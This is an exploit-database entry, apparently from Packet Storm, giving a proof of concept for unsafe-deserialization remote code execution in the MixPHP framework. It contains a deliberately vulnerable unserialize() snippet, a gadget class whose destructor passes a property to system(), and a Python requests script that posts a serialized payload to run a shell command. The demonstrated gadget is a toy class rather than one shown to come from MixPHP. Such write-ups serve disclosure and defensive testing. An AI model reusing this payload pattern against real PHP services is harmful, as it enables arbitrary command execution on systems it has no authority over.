Share
## https://sploitus.com/exploit?id=PACKETSTORM:222241
# Exploit Title: MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution
    # Date: 2026-05-14
    # Exploit Author: cardosource
    # Vendor Homepage: https://github.com/mix-php/mix
    # Software Link: https://github.com/mix-php/mix
    # Version: 2.x through 2.2.17
    # Tested on: Ubuntu 26.04 LTS / PHP 8.3.6
    # CVE: CVE-2026-42471
    """
    PHP applications that pass user-controlled input directly into
    unserialize() may be vulnerable to arbitrary code execution when
    attacker-controlled gadget chains are available.
    
    The following proof of concept demonstrates exploitation through
    a reachable __destruct() magic method.
    
    Vulnerable Code
    ===============
    
    $payload = $_POST["data"] ?? "";
    unserialize($payload);
    
    Gadget
    ======
    
    class A {
        public $c = 'id>/tmp/p';
    
        public function __destruct() {
            system($this->c);
        }
    }
    
    Lab Setup
    =========
    
    
    php -S 0.0.0.0:8000
    
    python3 php_deserialization_rce.py
    
    """
    
    import requests
    
    target = "http://127.0.0.1:8000/index.php"
    
    payload = 'O:1:"A":1:{s:1:"c";s:9:"id>/tmp/p";}'
    
    r = requests.post(target, data={"data": payload})
    
    print(r.text)